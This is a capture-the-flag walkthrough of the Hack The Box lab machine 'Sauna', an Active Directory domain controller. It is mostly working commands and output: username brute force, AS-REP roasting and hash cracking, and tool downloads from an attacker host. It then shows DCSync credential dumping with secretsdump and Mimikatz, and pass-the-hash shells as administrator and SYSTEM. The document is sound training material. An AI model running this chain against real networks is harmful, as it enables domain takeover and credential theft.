Sauna #3 AD
Reconnaissance:
NMAP:
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.175
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-24 11:27:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-12-24T11:28:36
|_ start_date: N/A┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.175
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.175
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-24 11:43:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49746/tcp open msrpc Microsoft Windows RPC
49775/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-12-24T11:44:50
|_ start_date: N/A
|_clock-skew: 6h59m59sThe IIS server version suggests this is a Windows 10 / Server 2016 / Server 2019 machine. The LDAP scripts show a domain name of EGOTISTICAL-BANK.LOCAL0. I’ll explore that more.
Enumeration: Website - TCP 80
The page represents a bank: http://10.10.10.175/
Just scrolling around, nothing interested jumps out. All the pages are static, and the forms don’t work. There isn’t much of value here. On the “About Us” page, there’s a list of the team which could be used to generate a list of users. Here, we used common patterns of account names in order to create a list and perform further attacks.
fergus.smith
shau.coins
hugo.bear
bowie.taylor
sophie.driver
steve.kerb
fsmith
scoins
hbear
btaylor
sdriver
skerb
ferguss
shaunc
hugob
bowiet
sophied
stevek While this list was created manually, you could use this awesome Python script, namemash.py, which generate a list of possible usernames from a person’s first and last name.
https://gist.github.com/superkojiman/11076951
Also, in a real-world scenario, website like https://hunter.io can help you to find a valid email pattern for a specific target.
Directory Brute Force:
While looking at the site, I also had gobuster running, but it didn’t find anything interesting either:
┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.175/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
[+] Url: http://10.10.10.175/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 150] [--> http://10.10.10.175/images/]
/Images (Status: 301) [Size: 150] [--> http://10.10.10.175/Images/]
/css (Status: 301) [Size: 147] [--> http://10.10.10.175/css/]
/fonts (Status: 301) [Size: 149] [--> http://10.10.10.175/fonts/]
/IMAGES (Status: 301) [Size: 150] [--> http://10.10.10.175/IMAGES/]
/Fonts (Status: 301) [Size: 149] [--> http://10.10.10.175/Fonts/]
/CSS (Status: 301) [Size: 147] [--> http://10.10.10.175/CSS/] Enumeration: SMB - TCP 445
I’ll try anonymous connections to the SMB shares, but no love:
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.175
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied}┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available Enumeration: LDAP - TCP/UDP 389
The nmap script did some basic enumeration and returned the domain EGOTISTICAL-BANK.LOCAL0. I’ll dig in a bit more with ldapsearch.
First the query to get the domain base is ldapsearch -x -h 10.10.10.175 -s base namingcontexts, where: -x - simple auth -h 10.10.10.175 - host to query -s base - set the scope to base naming contexts - return naming contexts
This gives the domain, EGOTISTICAL-BANK.LOCAL:
┌──(kali💀kali)-[~/Desktop]
└─$ ldapsearch -x -H ldap://10.10.10.175 -b "dc=Egotistical-bank,dc=local"
# EGOTISTICAL-BANK.LOCAL
# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCALThere’s a bunch of information there, but I didn’t end up using it.
Enumeration: DNS - TCP/UDP 53
Any time I see DNS, it’s worth trying a Zone-Transfer. Both sauna.htb and egotistical-bank.local failed to return anything:
┌──(kali💀kali)-[~/Desktop]
└─$ dig axfr @10.10.10.175 sauna.htb
; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr @10.10.10.175 sauna.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.┌──(kali💀kali)-[~/Desktop]
└─$ dig axfr @10.10.10.175 egotistical-bank.local
; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr @10.10.10.175 egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed. Enumeration: Kerberos - UDP (and TCP) 88
Without creds, one thing I can check on Kerberos is brute-focing user names. I’ll use Kerbrute to give this a run, and it finds four unique usernames:
kerbrute.py userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175I used a list of usernames from Seclists to do the brute to see if anything came out before trying to convert the names from the team page into a format. In a CTF, it makes sense to try a broad list first since it’s easier and noise doesn’t matter. If this were a real company, I’d probably try variations of the names, or look on social media to try to find a corporate email for the employees to get the username format first.
Shell as fsmith
AS-REP Roasting m0chan has a great post on attacking Kerberos that includes AS-REP Roasting. Typically, when you try to request authentication through Kerberos, first the requesting party has to authenticate itself to the DC. But there is an option, DONT_REQ_PREAUTH where the DC will just send the hash to an unauthenticated user. AS-REP Roasting is looking to see if any known users happen to have this option set.
Get Hash: I’ll use the list of users I collected from Kerbrute, and run GetNPUsers.py to look for vulnerable users. Three come back as not vulnerable, but one gives a hash:
┌──(kali💀kali)-[~/Desktop]
└─$ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:6a02f4f4365fe83193c8661a4abfdb69$5720d95e08482dfe4bb14f7ed28f55507fa9a628c8419eb5d352fd349d21eaa3247c8ac789554a0efdaa92c39bc36de8d76d6b0f3c5f2bd6bc5682cac5c6c8269bf2079ea67a56bebf7278ff0b41614f6ec130eddd2d391e423ab15df29b681404a8bf31a601dcbff41a2ee67ccda2c1cfc44b3a91f9fa97706047f5c55d9ab14ce6a3daf2b9a2861b3104f8b3eed2aa8dc8e01aff3dae32f81767a01f54a2f013a99d5ec91329bdc26b0f21186f0ec9417783678678b310a8a966a994371afb9c363a520fb6069c180bf8826968a39c63ceb286ea8a13a42a9b2d2190de501d56fb106bf1c8bddb8d0c17f58cbe285ed80ecf848b842083b81fea47d12d2d2eCrack Hash: Now I just need to kick this over to hashcat for cracking, and it works:
┌──(kali💀kali)-[~/Desktop]
└─$ hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force┌──(kali💀kali)-[~/Desktop]
└─$ john hashes.aspreroast -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:13 DONE (2023-12-24 02:37) 0.07267g/s 765897p/s 765897c/s 765897C/s Thing..Thereisnospoon
Use the "--show" option to display all of the cracked passwords reliably
Session completed. It returns the password, Thestrokes23
Evil-WinRM: If I didn’t already have Evil-WinRM installed, I could install it with gem install evil-winrm. Now I’ll use it to get a shell:
┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
d1e121--------------------------- Priv Esc: fsmith –> svc_loanmgr
First, I grabbed a list of all the domain users with the following command:
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgrMoving on to current user privileges…
*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledLooks like I do not have permission to run systeminfo.exe.
*Evil-WinRM* PS C:\Users\FSmith\Desktop> systeminfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1WinPEAS: For Windows enumeration, I’ll run WinPEAS.exe from the Privilege Escalation Awesome Scripts Suite.
PS SHARE:
┌──(kali💀kali)-[~]
└─$ python -m SimpleHTTPServer 5555*Evil-WinRM* PS C:\Users\FSmith\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/winPEASx64.exe', 'C:\Users\FSmith\Desktop\winPEASx64.exe')
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ./winPEASx64.exeIn looking through the results, AutoLogon credentials jumped out as interesting:
[+] Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!Evil-WinRM: Running net user on the box showed there was no user svc_loanmanager:
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr Priv Esc: svc_loanmgr –> root
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> systeminfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1I ran winPEAS.exe again, but nothing new jumped out at me. Since there’s AD stuff going on, I went to Bloodhound.
┌──(kali💀kali)-[~]
└─$ python -m SimpleHTTPServer 5555*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/winPEASx64.exe', 'C:\Users\svc_loanmgr\Desktop\winPEASx64.exe')
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> ./winPEASx64.exeSharpHound:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/SharpHound.exe', 'C:\Users\svc_loanmgr\Documents\SharpHound.exe')
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> ./SharpHound.exe -c DCOnly -d EGOTISTICAL-BANK.LOCAL --ldapusername svc_loanmgr --ldappassword 'Moneymakestheworldgoround!'Bloodhound:
┌──(kali💀kali)-[~]
└─$ sudo neo4j console http://localhost:7474/browser/
neo4j
neo4jDCSync: secretsdump My preferred way to do a DCSync attack is using secretsdump.py, which allows me to run DCSync attack from my Kali box, provided I can talk to the DC on TCP 445 and 135 and a high RPC port. This avoids fighting with AV, though it does create network traffic.
I need to give it just a target string in the format [username]:[password]@[ip]:
┌──(kali💀kali)-[~]
└─$ secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:fbb859fe3d5cc033ebfaac09e9d1dbaa:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:74b11dc407859019cbaabf83538239a05cb984a87ace138befa9ca3a7582533e
SAUNA$:aes128-cts-hmac-sha1-96:816a05c58f6e1b37a77671c41d05fdb0
SAUNA$:des-cbc-md5:abf2bfc258c4c225Mimikatz: I can also use Mimikatz like BloodHound suggested. I’ll download the latest release from the release page, and upload the 64-bit binary to Sauna:
upload /opt/mimikatz/x64/mimikatz.exe Mimikatz can be super finicky. Ideally I can run it and drop to a Mimikatz shell, but for some reason on Sauna it just started spitting the prompt at my repeatedly and I had to kill my session. It’s always safer to just run mimikatz.exe with the commands you want to run following it from the command line.
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exitThis spits out a ton of information. The hash I need (that matches the secretsdump output) is the Hash NTLM in the middle above. I could also use /all instead of /user:administrator to dump the entire user cache, but administrator is all I need here.
Shells:
WMI: I can use the administrator hash to WMI to get a shell as administrator:
┌──(kali💀kali)-[~]
└─$ wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175
C:\>whoami
egotisticalbank\administratorPSExec: Or PSExec to get a shell as SYSTEM:
┌──(kali💀kali)-[~]
└─$ psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175
C:\Windows\system32>whoami
nt authority\systemEvilWinRM: Or I can even use EvilWinRM:
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
e3aa90------------------------------Last updated